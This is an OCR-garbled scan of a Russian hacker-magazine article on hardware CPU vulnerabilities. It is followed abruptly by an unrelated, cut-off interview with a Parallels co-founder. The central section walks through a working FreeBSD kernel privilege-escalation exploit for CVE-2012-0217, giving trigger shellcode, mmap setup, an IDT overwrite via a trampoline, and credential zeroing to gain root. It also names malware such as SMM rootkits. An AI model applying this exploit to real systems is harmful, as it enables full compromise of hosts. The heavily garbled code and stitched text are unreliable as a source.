стоитотнести блоки декодирования СІ5С-микрокоманд в РІ5С- 
команды, обработчики исключений, блоки состояний. 

2. Проверка полученных да иных — на этом этапе полученные 
данные начина ют обрабатываться, проводится отбор «эксплуа- 
табельных» ошибок, то есть потенциальных уязвимостей (ищи 
исходники на нашем 0Ѵй — файл згс/соге2сіііо_еггаІа). 

3. Написание РоС (в перспективе — боевого эксплойта) — создание 
наглядно демонстрирующего ошибку Ргоо^-о^-СопсерІ эксплойта. 
Это можетпомочьдругим исследователям и разработчикам разо- 
браться в проблеме, используя собственный подход. Сценарии 
эксплуатацииуязвимостей практически неотличаются отсо- 
фтверных: 

а) І_осаІ ргіѵііедеевсаіаііоп — локальное повышение приви- 
легий. Сюдаже можноотнести )аіІЬгеак'и и выполнение кода 
в гіпд 0; 

б) Кетоіеехріоііаііоп — удаленный захват управления; 

в) ОепіаІо^Бегѵісе — отказ в обслуживании. Очень эффективно 
при менять да иного рода эксплойты против аппаратных файр- 
волов. 

КЛАССИФИКАЦИЯ УЯЗВИМОСТЕЙ И ВОЗМОЖНЫЕ 
НАПРАВЛЕНИЯ ИССЛЕДОВАНИЙ 

Уязвимости в железе можно разделить на два подкласса — псев- 
доаппаратные и аппаратные. 

1. Псевдоаппаратныеуязвимости.Ихбольшинство, и ими кишат 
публичные базы эксплойтов (ехрІоіІ-сІЬ, 1337сІау, раздел Ьагсіѵѵаге). 
Многие выдают их за аппаратные. На самом деле они являются 
псевдоаппаратными, потому что эксплуатируют ошибку не в самом 
оборудовании, а в прошивке/драйвере/СРМ (системе управления, 
которая может быть представлена в виде веб-панели, 55Н,ТеІпеІ 
или другого протокола передачи информации и управления). 
Пример псевдоаппаратных уязвимостей, информация о которых 
хранится в базе ехрІоіІ-бЬ, представлен на иллюстрации. Ихне- 
сложно классифицировать по типу уязвимостей: 
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Примеры работы в отладчике СРВ 



а) уязвимости типа «Переполнение буфера». Пример: Хегох 
ѴѴогксепІег4150 Ретоіе ВіШегОѵегЛоѵѵРоС ( Ьіі.Іѵ/І\І1.С2ѵг ). 
Уязвимость заключается в неправильной обработке одного из 
параметров (ІАЫСІІАСЕ) при создании задачи печати; 

б) зашитые пароли, ключи (софтверный бэкдор). Пример: Р5 
ВІ6-ІР Ретоіе Рооі АиіЬепІісаІіоп Вуразз ѴиІпегаЬіІіІу 0-сІау 
( Ы1.1у/К52РРВ ). Уязвимость заключается в использовании 
зашитого в систему 55Н -ключа, обладая которым атакующий 
можетполучитьдоступ кцелевой системе. 

в) Уязвимости веб-приложений (50І_і,Х55, С5ВР, І_РІ, КРІ, АиІІі 
Вуразвитакдалее) Пример: Ниаѵѵеі Н6866 АиіЬепІісаІіоп 
Вура5з( Ьіиу/МдНЭ5т ). Уязвимость заключается втом, что не 
все скрипты проверяют наличие валидной сессии в куках, что 
позволяет сменить пароль администратора. 

2. Аппаратные уязви мости — это уязвимости, связанные с проекти- 
рованием аппаратных схем. 

При проектировании процессорных микросхем и более- 
менее сложных микроконтроллеров, равно как и при создании 
сложного программного обеспечения, могут возникнуть раз- 
личного рода ошибки. Часть из них могут стать потенциальными 
уязвимостями, которые создают «дыры» в железе. Если дыр 
становится чересчур много, то такое железо делается похожим 
на дуршлаг. Так случилось с продукцией компании Іпіеі в начале 
90-х, когда ошибки в СРІІ этого производителя гребли лопатой. 
Это нормально для компании с небольшим штатом специалистов 
и отсутствием тестирования. По мере роста компании Іпіеі в ее 
составе начинают появляться отделы тестирования, отладки 
микропроцессорных схем. В конечном итоге именно благодаря 
им количество уязвимостей сводят практически к нулю. Спустя 
некоторое время, а именно в начале 2006 года, для процессоров 
серии Іпіеі Соге20ио/5оІо выходит неофициальная еггаіа (свод 
ошибок), подготовленная парнями с сайта деек.соп . Примерно 
через два месяца (заметь, какой срок, и это еще не предел) после 
выхода неофициального свода ошибок Іпіеі нехотя признает их 
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и вносит в официальную еггаГу. Ну баги как баги, ничего при- 
мечательного — можно подумать на первый взгляд. И ошибиться 
:). Особый интерес представляли баги, которые несли в себе 
потенциальную уязвимость ( АЕ 1 /2/4/5/6/9/1 2/13/16/17/18/20/21/ 
30). В тот момент многие не обратили внимания на это событие, 
за исключением нескольких исследователей, одним из которых 
был Тео де Раадт (Тбео бе РаасЙ). В своих докладах он предупре- 
ждал о возможных последствиях, к которым могут привести 
найденные ошибки в Соге20ио. Многие эксперты по ИБ посчитали 
его высказывания параноидальными и комичными, посмея- 
лись... и досмеялись :). В середине 2007 года в Сети появляется 
информация о боте нового поколения с руткит-функционалом для 
промышленного шпионажа (5*ихпе*, обломись), автором которого 
являлась некая Веіепа, представительница китайского андегра- 
унда. Для распространения бот использовал один из уникальных 
эксплойтов, который, впервые в мировой практике, эксплуати- 
ровал «железную» уязвимость, а именно баг в контроллере кеша 
Соге20ио, являвшегося на тот момент популярным решением для 
многих серверных систем (этот проц обеспечивал великолепное 
соотношение цена/производительность). Позднее, в 2008 году, 
Крис Касперски решает реконструировать эксплойт для данной 
уязвимости. В качестве примера он использует сэмпл руткита, 
полученный у той самой Беіепа, но извлечь сам эксплойт из тела 
руткита ему так и не удалось. На конференцию НІТВ2008 он при- 
вез «выдранную» реверс-инжинирингом специально сконструи- 
рованную виртуальную машину (ѴМ) и ѴМ-байткод эксплойта. 
Задачей эксплойта было локальное повышение привилегий для 
руткита, в теле которого он и располагался. Если пораскинуть 
мозгами, то отреверсенный эксплойт Криса можно без особых 
усилий трансформировать из локального в удаленный (метод 
ІосаІ2гето*е). В зависимости от целей эксплуатации выделяют 
два пути трансформации: 

1. еК-гетоІеэксплойт — представляет собой НТМЬстраничку 

с внедренным кодом эксплойта на популярном скриптовом языке 
Р5, Эаѵа, А53). Как ты понял, для эксплуатации уязвимости не- 
обходимо будет за влечь пользователя на эту страницу :). Вход 
может идти все, начиная с социальной инженерии и заканчивая 
веб-шеллом на популярном сайте; 

2. {иіі-гетоіеэксплойт — віапсі-аіопе программа, посылающая 
специально сформирова нн ыйТСР/ІР-па кет компьютеру жертвы. 

Каждый из рассмотренных путей имеет свои плюсы и минусы. 
Мне показалось, что провести трансформацию по первому методу 
будет наиболее выгодным и наглядным для тебя. Предлагаю тебе 
ознакомиться с заранее подготовленным сплоитом, реализован- 
ным на 65, ты можешь найти его на нашем диске (згс/сри_Ьид_5гс). 



СѴЕ-201 2-0217 

Перед нами уязвимость в процессорах Іпіеі, а именно — О-бау 
наших дней, который был отмечен Рафалем Войчуком (Ра*аІ 
ѴѴо^сгик) со статусом СгШсаІ. По иронии судьбы, уязвимость 
была исправлена в І_іпих еще в далеком 2006-м (многие ее знают 
как СѴЕ-2006-0744), но тогда мало кто обратил на нее внимание, 
а Іп*еІ в очередной раз отмахнулась, присвоив авторство данной 
уязвимости разработчикам ядра Линукс. Какты понял, основной 
плюс данной уязвимости в том, что она, являясь хардварной, 
позволяет пробить большинство из существующих ОС (РгееВЗй, 
Ые*В50, Зоіагіз, ѴѴіпбоѵѵв) и систем виртуализации (ХЕІ\І, КѴМ). 

В І_іпих она появилась в виде репорта от компании Реб На* (РН5А- 
2012:0720-1, РН5А-2012:0721 -1). Причина возникновения данной 
уязвимости в том, что ІпІеІ'овский микропроцессор некорректно 
хэндл ит канонический адрес до переключения в непривилеги- 
рованный режим (г0 — » гЗ). В АМй -процессорах данная операция 
выполняется с точностью до наоборот: сначала микропроцессор 
переключает код в непривилегированный режим (гЗ) и только по- 
сле этого вызывает #6Р. Таким образом, при установке пользова- 
телем указателя инструкций РІР неканонического вида процес- 
сор вызывает обработчик ошибки, который, будучи еще в гіпд 0, 
запустится с выбранными пользователем значениями регистров 
%дз и %гзр. 

Я надеюсь, ты уловил суть баги. Давай рассмотрим технику экс- 
плуатации на практике написания сплоита для РгееВЗй. В процес- 
се ее реализации нужно выполнить следующие шаги: 

1. Выбор способа отладки ядра, настройка отладчика (отладка 
отладке рознь ввиду кардинальных различий в виртуальных 
машинах). 

2 . Сбор поверхностной информации об уязви мости 
по структурам и объектам ядра. 

3. Соблюдениеправил эксплуатирования подобного 
рода уязвимостей: 

• ядро должно работать корректно, иначе система уйдет в даун; 

• необходимо корректно восстановитьстраницу исключения 
ошибок (депегаі раде*аиІ*ехсер*іоп — #6Р); 

• необходимо повысить привилегии и выполнить код в гіпд 0. 

4 . Программная реализация эксплойта. 

Поехали! Первым делом для этих целей необходимо настро- 
ить виртуалку — сложно что-то делать, когда твоя клавиатура 
мигает под ритмичную музыку кегпеі рапіс :). Лично мой выбор 
пал на ѴМѵѵаге из-за дружелюбного интерфейса отладки госте- 
вой ОС. В качестве основной ОС (на которой проходила отладка) 
и гостевой (ОС для тестов) была выбрана стабильная версия 
РгееВВО 9.0. Настройка виртуальной машины проста до безоб- 
разия: 



САСНЕ Р0І50ЫІЫ6 ДЛЯ ПРОЦЕССОРОВ 



В марте 2011 года известная руткитописательница Джоанна 
Рутковская Роаппа Ви*коѵѵ5ка) опубликовала информацию 
об уязвимости в процессорах Іп*еІ, позволяющей выполнить 
произвольный код в режиме 5ММ с привилегиями большими, 
чем привилегии нулевого кольца (гіпд 0). 

5ММ (5у5*ет Мападетеп* Мосіе) — это специальный 
малодокументированный режим работы процессоров 
Іп*еІ, который впервые появился в 38651. В этом режиме 
приостанавливается нормальное выполнение кода 
и специальное ПО (обычно Лгтѵѵаге или отладчик 
с аппаратной поддержкой) выполняется в режиме с высокими 
привилегиями. 



Эксплойты используют кеш процессора для доступа 
к 5МРАМ — защищенной памяти для режима 5ММ. Из двух 
представленных эксплойтов один делает дамп памяти 5МВАМ, 
а второй производит выполнение кода в режиме 5ММ. 

Потенциальное применение уязвимости привело 
к появлению 5ММ-руткитов, которые компрометировали 
работу гипервизоров и обходили современные защиты ОС на 
тот момент. Известно, что Іп*еІ была осведомлена о данной 
уязвимости, — она исправила ее в материнской плате 0045СВ, 
хотя более ранние модели остались уязвимыми, а патча, 
к сожалению — а может, и к счастью ;), — не появилось по сей 
день. 






Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. 

Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



022 



ХАКЕР 09/164/2012 





Железный дуршлаг 





Схема эксплуатации 



1. Создаем новую виртуальную машину в ѴМѵѵаге. 

2. Открываем конфигурационный файл, созданный ѴМ (имеет рас- 
ширениеѵтх), и добавляем следующую строку: 

сІеЬи§51:иЬ. Іівііеп .§иев1:64 = "ТКІІЕ" 

После чего при запуске созданной ѴМ ѴМѵѵаге для отладки 
откроет локальный порт 8864, к которому можно будет спокойно 
подключиться из любого отладчика, к примеру ЗОВ: 

(§сІЬ) іаг§е1: гетоііе ІосаІІіоБІ: : 8864 

Отладчик ЗОВ для этих целей также стоит сконфигурировать 
самостоятельно для корректного отображения символов отлажи- 
ваемого окружения: 

> біісіо рогі іпвііаіі §еі1:ех1: §тр ІіЬеІ-Р 

> сигі -О Іі1:1:р://-Р1:р.§пи.ог§/§пи/§сІЬ/§сІЬ-7.4.1.1:аг.Ь22 

> іаг хѵд-р §сІЬ-7.4.1.1:аг .Ьі2 

> ссі §сІЬ-7.4.1 

> СРІ_АС5^І/ор1:/1оса1/іпс1исІе ./сопб§иге \ 

--ргебх=/ор1:/1оса1 \ 

- -рго]5гат-5и-Р6х=-атсІб4-ітіагсе1--РгееЬ5сІ \ 
--1:аг^е1:=атсІб4-тапсе1--РпееЬ5сІ 

> таке 

> біісіо таке іпвііаіі 



и_1оп§ §е1;_5утасІсІп(сІіаг^*5утпате) 

і_ 

Бігисі: кісівѵтіоокир квут; 
квут.ѵегвіоп = вігео-Р (квутѴ. 
квут. вутпате вутпате; 



і-р (кІсІвѵтГѲ. КІ_05ѴМ_І_00КІІР, &квут) < 0) 
реггогС'кІсІвут" ) ; 
ехіі(1); 

} 

ргіпі -РС [+] Кевоіѵесі %в 1:о %#1х\п"^Л 

квут. вутпате., квут. вутѵаіие) ; 
геіигп квут. вутѵаіие; 

Теперь подумаем над тем, как эксплуатировать уязвимость. На 
самом деле все просто: 

1. Выделяем страницу памяти перед неканоническим адресом на 
границе 0x0000800000000000. 

2. Вызываем произвольный системный вызов (вувсаІІ) при помощи 
системного вызова инструкции, расположенной непосредствен- 
но перед адресом неканонической границы. 

Когда обработчик іазізузсаІІ восстановит регистры пользо- 
вателя, он выполнит инструкцию вувгеі и попытается вернуться 
к «следующей инструкции» в 0x0000800000000000, «забыв» 
сменить режим гіпд 0 — > гіпд 3. Соответственно, #ЗР запускается 
в режиме ядра. Кроме этого, исключение кадра помещается в стек 
гіпд 3. Таким образом, мы можем перезаписать указатели ядра на 
тот адрес, которым можно управлять с гіпд 3. 

иіп1:64_1: ра§евіге = §е1:ра§евІ2е( ) ; 

иіп1:8_і * агеа = (иіпі8_і*) ( (ШІ_І_ << 47) - ра§евІ 2 е); 
агеа = ттар(агеа,, ра^ евіге , 

РКОТ_КЕАО | Р КОТ ілі К I Т Е | РКОТ_ЕХЕС, 

МАР РІХЕР 1 МАР_АШМ 1 МАРРКІѴАТЕ . -1, 0); 
і-р (агеа == МАР РАН ЕР) { 

реггог("ттар (Іігі^ег)"); 
ехіі(1)^ 

Ь- 



// Копируем исполняемый код триггера. 

// что находится на границе конца страницы 
// таким образом, чтобы выполнился наш вѵвсаіі 
сбаг ігі^егсосІе[ ] = 

"\хЬ8\х18\х0Ѳ\х00\х00" 

// тоѵ гах, 24; #§еіиісІ 

"\х48\х89\хеЗ" 

// тоѵ гЬх. гвр; сохраним регистры гЗ 

// для последующих действий 

,, \x48\xЬс\xЬе\xЬа\x-Ре\xса\xсIе\xс0\xасI\xсIе ,, 

// тоѵ гвр. ѲхсІеасІсѲсІеса-РеЬаЬе 

"\х0-Р\х05"; / / вѵвсаіі 



иіп1=8_1= * ігі§§ег_асІсІг = агеа + \ 
ра§евіге ^ ТКІ66ЕКССЮЕ5І2Е; 
тетсру(1:гі§§ег_асІсІг., ігі§§егсосІе., ТКІССЕКСОРЕ5І2Е) ; 



Ну и наконец, создаем директорию для отладки, к примеру 
рос_беЬид, и копируем туда исходные директории РгееВЗй /ивг/ 
вгс и /Ьооі/кегпеІ, в которых находятся исходники для отладки (см. 
рисунок «Примеры работы в отладчике ЗОВ»). 

С настройкой отладчика разобрались, приступаем к сбору 
информации. Во время эксплуатации уязвимости нам понадо- 
бится информация (символы), которая располагается в адресном 
пространстве ядра. Во РгееВЗй есть встроенная функция кІсІвутО, 
которая позволяет «достать» нужные нам символы, предоставляе- 
мые ядерной функцией деІ_вутасІсІг(). 



ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА 

При перезаписи значения целевого регистра Р5Р существует два 

исхода: 

1. Если значение регистра Р5Р не может быть перезаписано, 
срабатывает сІоиЫе^аиІІ (двойная ошибка), вызванная функцией 
ХсІЫіаиІіП, и кадр исключения помещается в специальный стек, 
который закреплен заданного рода исключениями. 

2. Во втором случае #ЗР возникает в ХргоШ и кадр исключения за- 
носится в регистр Р5Р, таким образом его значение перезаписы- 
вается. 
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ПЕРЕД НАМИ УЯЗВИМОСТЬ 
В ПРОЦЕССОРАХ ШТЕІ., 

А ИМЕННО — КРИТИЧЕСКИЙ 
О-ОАУ НАШИХ ДНЕЙ 



ЮТ УЕСГргоТ) 



БііЬд 


$ТР ЕККДгвр 


тоѵі 


$Т РКОТРІ_Т,ТР ТКАРІ\ІО(%Г5р) 


тоѵд 


$0,ТР АРРК(%Г5р) 


тоѵд 


%ГСІІ.ТР КРІ (%Г5р ) 


// Очищаем 


регистр для 6Р 



Іеад сІоге1:і_іге1:(%гір) Дпсіі 



стрд %г сІі,ТГ_КІР(%г5р > ) 



те 1-Р 


Ц_ 


Ядро с юзермод 65 Ьаве г0->г3 




іезІіЬ 


$5ЕІ_ КРІ_ МА5К.ТР С5Р%Г5р) 


И 


Проверяем, откуда мы пришли 


и 2-р 


// 


Продолжение работы в режиме ядра г0 


зыардБ 




тоѵд 


РСРЩСІЖРСВ) Дгсіі 



Так как мы пришли из ядра (при выполнении инструкции 
зузгеі), при проверке ІезіЬ $5ЕІ__РРІ__МА5К,ТР_С5(%ГБр) устанав- 
ливается флаг 7‘, поэтому по команде \г мы прыгаем на указанную 
метку 2\, обходя тем самым инструкцию свопа 65 — зѵѵардз. Но что, 
если сценарий разворачивается по первому пути? Так как цепь со- 
бытий 65 происходит в 65 гіпд 3, при доступе к 65:сЫа произойдет 
вызов ошибки страницы ХРаде(). Таким образом, цепочка событий 
іаиіі, боиЫе Ігірріе І'аиМ: и так далее приведет к краху систе- 
мы. Если включить смекалку, то можно придумать выход из этой 
ситуации: вернуться в начало и восстановить значение регистров, 
которые мы перезаписали. Далее было бы неплохо, если бы мы 
могли заменить адрес обработчика ошибки страницы, что позволит 
выполнить произвольный код, если возникнет исключение #РР. 

В этом нам поможет метод восстановления структур. 

Смотрим шлюзы дескрипторов: 



+0: Таг§еі ОТТ 
+4: Боте віи-р-р 


5ет[15 : 0] | 
1 


Таг§еі Беіестог 
Тагееі О-р-рБеі: Г 31 : 161 


+8: Тагееі 0-р-Р5еіГбЗ:321 


+12: Боте тоге 


Біи-Р-Р 




И файл іпсІисІе/Тгате.М: 




біігіісі ігар-Ргате { 




гедізііег 1: 


і-р пс Іі ; 




педІБІіеп 1: 


і-р гбі; 




ге^ІБІіеп 1: 


і-р гсіх : 




гедІБІіеп 1: 


і-р гсх; 




гедІБІіег і: 


і-Р г8; 




гедІБіег 1: 


і-р г9; 




гедІБІіег і: 


і-р гах; 




гедІБіег 1: 


і-Р гЬх; 




ге§І5І;ег і 


і-р гЬр; 




педІБІіеп 1: 


і-Р г10; 






ге§І5І:ег 1: 


і-р гРіэдб; 




гедІБІіег 1: 


і-р гбр; 




гееізііег 1: 


і-Р бб; 







Когда сработает исключение, микропроцессор заризЬит в стек 
значения зз, гзр, гИадз, сз, гір, егг. Это иллюстрируют инструкции 
тоѵі $Т_РР0ТРЕТ,ТР_ТРАРІ\І0(%г5р), тоѵц $0,ТР_АООР(%гзр). Они 
пишут в стек рассматриваемые значения. Основная проблема 
в том, что, когда происходит исключение, Р5Р использует авто- 
матическое выравнивание в 16 байт. Таким образом, существует 
возможность перезаписать только первые 32-І_5В смещения. 

Еще одна инструкция — тоѵі $Т_РР0ТРІ_Т,ТР_ТРАРІЧ0(%г5р) 
пишет от 0 до и_асісІг. Она также использует выравнивание в 16 
байт. РІадежда на последнюю инструкцию тоѵі $Т_РР0ТР1_Т,ТР_ 
ТРАРІ\ІО(%гзр). И да! Она пишет значение Т_РР0ТР1_Т (0x9) в 
Ігарпо, используя выравнивание в 16 + 8 байт! То, что нам нужно. 
При помощи этой инструкции мы можем установить в целевые 
смещения [63:32] значение 0x9. Если установить значения в Р5Р 
ЮТ[14]+10*8 (выравнивание іМгарпо с целевой #РР смеще- 
нием [63:32]), мы можем установить адрес #РР обработчика на 
0х9ѴѴѴѴХХѴѴ22. Кроме того, значение ѴѴѴѴХХѴѴ22 нам уже заранее 
известно, так как мы можем получить адрес #РР при помощи 
функции деІ_5утасІсІг(). Для того чтобы мы смогли выполнить 
произвольный код на системе, нужно будет установить трамплин- 
код на 0х9Ѵ\/ѴѴХХѴѴ22, который содержит код установки и переход 
на наш ядерный пэйлоад. 

*(иіпі64_1:*) (ігі§§ег_асІсІг + 10) = \ 

(иі ігЕ 64_'Е) ( ((иіп~Е8_'Е*)&5ІсГЕО [14 ] ) + 10 * 8); 



сбаг 1=гатр о1іпесосІе[ ] = 

"\х0Т\х01\х-Р8" 

// зыар^з; переключаем в гѲ §з:Ьазе 

"\х48 \х89\хсіс" 

// тоѵ гзр. гЬх; восстанавливаем значение гзр, 

// если нет больше возможности использовать гЗ-стек 
"\х48\хЬ8\хЬе\хЬа\х-Ре\хса\хсІе\хс0\хасІ\хсІе" 

// шоу гах, ѲхсІеасІсѲсІеса-РеЬаЬе 

" \х-Р Т\хеѲ" ; 

// ітр гах 



иіп1:8_1= * ігатроііпе = ( и іп1:8_і*) (0x900000000 \ 

| (Хра§е_р*г & ѲхРРРРРРРР ) ) ; 
зііе 1: ігатроііпе аІІосБІге = ра^езіге; 

// В конце обращаемся к РА6Е5І2Е для распределения 

// Не хватает места для трамплин-кода? 

ІТ ( (иіп1:8_1=*) ( (иіп1=б4_1=)1:гатро1іпе & 

~(ра§езІ 2 е- 1 ) ) + ра§езіге < ігатроііпе + 

ТКАМРОІ.ІІМЕСОРЕ5І2Е ) 

ігатроііпе аііо сзіге += ра^ езіге ; 

ІТ ( тта р( (ѵоісі* ) (Чиіп1:64 Оіігатроііпе & 

~(ра§езІ 2 е- 1 )) . Тгатроііпеаііосзіге. 

РКОТ_КЕАР | РКСГМлІКІТЕ | РКОТ_ЕХЕС, 

МАР_РІХЕР I МАР_АІ\ІОІ\І | МАР_РКІѴАТЕ, -1, 0) 

== МАР РАИЕР) { 

реггог("тщар (Іігатроііпе)"); 
ехіі(І) ; 

ь_ 

тетсру(1:гатро1іпе, ігатроііпесосіе, ТКАМР0ИІМЕССЮЕ5І2Е) ; 
*(иіпТб4_і:*) (Тгатроііпе + 8) = \ 
(иіп1:64_1:)кегпе1тосІерау1оасІ; 

ПОДДЕРЖКА СТАБИЛЬНОГО ЯДРА 

Мы разобрались с исполнением произвольного кода, но забыли 
главное. Сразу же после того, как мы получим заветный зЬеІІ, ядро 
вылетит в кегпеі рапіс. Это произойдет потому, что мы не восстано- 
вили структуры ядра после перезаписи. Чтобы этого не произошло, 
необходимо восстановить структуры в таблице ЮТ: 

• исключение фрейма #6Р перезаписывает шесть 64-битных реги- 
стров, тоестьпроисходитперезаписьЮТ[18], ЮТ[17] и ЮТ[16]; 

• Н_асИгперезаписывает64-І_5В в ЮТ[15]; 
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іМгарпо перезаписываетсмещение [63:32] в ЮТ[14]; 
регистр ПйІ перезаписывает64-І_5В в ЮТ[7]; 
исключениефрейма #РРперезаписываетЮТ[6], ЮТ[5] и ЮТ[4]. 
Сказано — сделано: 



зеііісіі: С ісіі: . ЮТ ОР, ХоП ріг, \ 


5РТ 5У5ІСТ, 5ЕІ_ КР1_, 0) 


; // 4 


Беріей: (ісЙ:. ЮТ ВК, ХЬпсІ ріг, \ 


БОТ 5У5І6Т. 5ЕІ_ КРІ_. 0) 


; // 5 


Беріей (ісЙ. ЮТ ІЮ. ХІ11 ріг. \ 


БОТ 5У5ІСТ . 5ЕІ_ КРІ_, 0) 


; // б 


5еі:і(Й(і<Й, ЮТ NN. Хсіпа ріг, \ 


БОТ 5У5І6Т, 5ЕІ_ КР1_, 0) 


; // 7 


Беііісіі: Г ісіі: . ЮТРР. Хра§е ріг. 


\ 


БОТ 5У5І6Т, 5Е1_ КРІ_, 0) 


; // 14 


БеіісйСісЙ . ЮТ МР. ХТри ріг. \ 


БОТ 5У5І6Т, 5ЕІ_ КРІ_, 0) 


; // 15 


БеіісЙ (ісй. ЮТ АС. Ха1і§п ріг. 


\ 


БОТ 5У5І6Т, 5ЕІ_ КРІ_, 0) 


; // 16 


5е~ЕісЙ(ісЙ. ЮТ_МС . Хтсіік рііг. 


\ 


БОТ 5У5ІСТ , 5ЕІ_ КРІ_, 0) 


; // 17 


БеіісЙГісЙ . ЮТ ХР . Ххтт ріг. \ 


БОТ 5У5ІСТ, 5ЕІ_ КРІ_, 0) 


; // 18 






ПОВЫШЕНИЕ ПРИВИЛЕГИЙ 





Самое простое, что будет в нашем эксплойте. Единственное, что 
потребуется, — это узнать адреса идентификаторов текущей 
учетной записи и изменить их значение на 0 (значение иденти- 
фикатора для гооі). Зная, что адрес текущей структуры потока 
в РгееВЗй может быть прочитан с 65:0, можно написать следую- 
щий код: 



бігіісі: ІіИпеасІ *1ісІ ; 



бігіісі: испесі *сгесІ; 



// Получаем адрес текущей структуры потока 
эбш ("тоѵ %%^б:0. %Ѳ" : "=г"(1:сПѴ. 



сгесі = 1:сІ - >~ЬсІ_ргос- >р_исгесІ : 

сгесІ->сг_иісІ сгесі- >сг_гиісІ = сгесі- >сг_г§ісІ = 0; 

сгесі ->сг_§гоир5[0] = 0; 

Ну и наконец, напишем обертку и сам гіпд 3 шелл-код, который 
будет использовать инструкцию зузгеі для выполнения кода в гіпд 
0 : 

азт ("5ыар§5; БѴБгеІід; " : : "с"(5Ііе11сосІе)) ; 

// Восстанавливаем адрес шелл-кода из регистра гсх 

ѵоісі Б ІіеІІсосІеП 

і _ 

ргіпі-РГ' [*] ыѲѲ1=! ыѲѲ1=!!. и §01: гѲѲІ:! :Р\п"Ѵ. 
ехі1:(0)^ 

} 



Хм... Стоп, а где же сам шелл-код? А его нет :). Все дело в том, 
что структура учетных данных пользователя распределяется 
между процессами этого пользователя. Так как мы изменили 
идентификаторы, порожденный зЬеІІ будет автоматически на- 
следовать привилегии с идентификатором 0, то есть привилегии 
суперпользователя гооі (примеры эксплойтов и РоС смотри в зге/ 
СѴЕ-2012-0217). 



ПОДВЕДЕМ ИТОГИ 

Возможно, сейчас поиск ошибок в железе — это экзотика, 
но, поверь, придет время, когда аппаратные уязвимости войдут 
в нашу жизнь и будут популяризироваться день ото дня, как и их 
софтверные братья. Эпидемии «железной» малвари также 
не за горами. В следующей статье под моим скальпелем ока- 
жутся концептуальные релизы на эту тему. Следи за новыми 
выпусками. И-И 






Р53: ПОЛНОЦЕННАЯ АППАРАТНАЯ 
УЯЗВИМОСТЬ В МИКРОПРОЦЕССОРЕ СЕН 



Воттак новость выдали зарубежные СМИ в конце 2010 года. 
Какты уже знаешь из предыдущих выпусков ][, первым 
уязвимость в игровой приставке РІау Зіаііоп скандальной 
корпорации 5опу нашел не кто иной, как СеоНоС На самом 
деле большая часть исследований была совершена до 
СеоНоІ'а его командой ІаіІоѵегІІОѵѵ, откуда он ушел за год до 
своего открытия. 

Вдоволь начитавшись материалов на сайте Іаііоѵег- 
ІІОѵѵ и в блоге Джорджа Хотца, я не удовлетворился, ибо 
представленная уязвимость носила псевдоаппаратный 
характер. 

Годный эксплойт появился в начале марта 2011 года, 
когда хакер под ником ОагкНаскег сообщил о том, что нашел 
аппаратную уязвимость в микропроцессоре производства 
ІВМ — СеІІВгоасіЬапсІСРи. 

Обращение хакера к народу: «Уязвимость в СРВ поможет 
нам подойти на шаг ближе к МЕТЮВ. Я решил опубликовать 
эту информацию, потому что люди имеют право делать, что 
им хочется, и информация должна быть свободна. Знаю, 
что за это меня могут засудить. Пусть катится гадкая 5опу 
к черту! Все это для таких же, как я, хакеров. И я буду 
бороться за права людей до конца своей жизни». 




• Каталог 

псевдоаппаратных 
уязвимостей на 
ехрІоіІ-сіЬ.сот: 

ЬіІ.Іѵ/ОРгке2: 

• базовая матчасть 
по процессорам: 

ЫЫу/М7Р5У5: 

• официальная 
эррата отіпіеі: 

Ьіиѵ/ІкМІНд: 

• детальное 
описание 
уязвимости 
СѴЕ2012-0217 от 
разработчиков ХЕИ: 
ЬіІ.Іѵ/КЕТНКЬ: 

• отличная 
презентация 
хардварной 
уязвимости в Р53: 
ЬіЫѵ/ЫкпБг: 

• ресурсы, 
посвященные 
безопасности 
приставокБопу: 
рзЗзсІк.сот. р$- 
агооѵе.сот: 

• аНаскіпдБММ 
Метогу ѵіа ІпІеІ СРЦ 
СасИе Роізопіпд: 
ЬіІ.Іу/гоІНК . 
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История создания гигантов ІТ — Арріе, 
МісгозоЛ:, РасеЬоок — была романтизи- 
рована Голливудом и журналистами 
и сведена к прямой линии между точка- 
ми А и В. Однако рассказ о возникнове- 
нии компании РагаІІеІз из уст прямого 
участника событий показывает, что 
в реальности для такой линии попросту 
не хватает букв в алфавите. 



СТАНИСЛАВ 

ПРОТАСОВ 

СООСНОВАТЕЛЬ И ГЛАВА РАЗРАБОТКИ 
КОМПАНИИ РАКАЫ.ЕІ.5 



НАЧАЛО 



Я поступил попал в МФТИ, моей базовой кафедрой был 
Институт физики высоких энергий. Классное место. 
Находится в подмосковном Протвино, и у них есть свой 
ускоритель частиц (второй, после СЕРЫ), свое кольцо. 
Насколько я понимаю, он до сих пор работает. 

У них было фантастическое по тем временам обе- 
спечение вычислительной техникой и литературой. КГБ 
был продвинутой организацией, он обходил все запреты 
на поставку техники в СССР. Конечно, это все на уровне 
слухов, но, говорят, они работали со спецслужбами ГДР, 
которые ходили в ФРГ (пешком, через особую калитку 
в Берлинской стене), покупали компьютер и несли его 
обратно. Потом эта техника доставлялась в Советский 
Союз. 

Я учился и, прямо скажем, занимался всякой полу- 
ерундой, как и любой другой студент. Работа была очень 
простая: есть ускоритель частиц, есть какие-то датчики, 
и нужно, чтобы данные с этих датчиков поступали на 
компьютеры, хранились и обрабатывались. Для налажи- 
вания процесса как раз требовались специалисты по вы- 
числительной технике. Поскольку я тогда только учился, 
меня загружали не самыми важными задачами. 



После института наступило интересное время. Было труд- 
но найти работу, непонятно, как вообще это делать. Ведь когда 
я получил диплом, на дворе был 1993 год — первый или второй 
год, когда институтское распределение отменили. Мало какие 
компании испытывали нужду в специалистах. В научных-то 
организацияхточно никто не был нужен, а обслуживающий 
компьютеры персонал тогда почти не требовался, ведь ком- 
пьютеры стоили очень дорого и потому были редкостью. 

Тогда купить хороший компьютер можно было за 
1500-3000 долларов, а зарплата... Скажем, моя первая 
зарплата после института составляла 30 долларов в месяц. 
То есть компьютер я мог позволить себе после десяти лет 
упорной работы. 

Совершенно случайно я прибился к институту при МИЭТ 
(Московский институт электронной техники) в Зелено- 
граде, где провел около года. Это был полезный опыт. Там 
я открыл для себя несколько новых тем, о которых раньше 
не слышал: познакомился с софтом для проектирования 
микросхем САБ, увидел живьем НР'шный ІЭ N IX, узнал, что 
вообще существует Б N IX, что у него развитая соттапсі Ііпе, 
под него пишут драйверы для устройств, у него такая-то 
графическая система и так далее. 
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С0ѴЕК5Т0КѴ 




Я получил неплохой опыт, но потом работа 
как-то... закончилась. Институт был государ- 
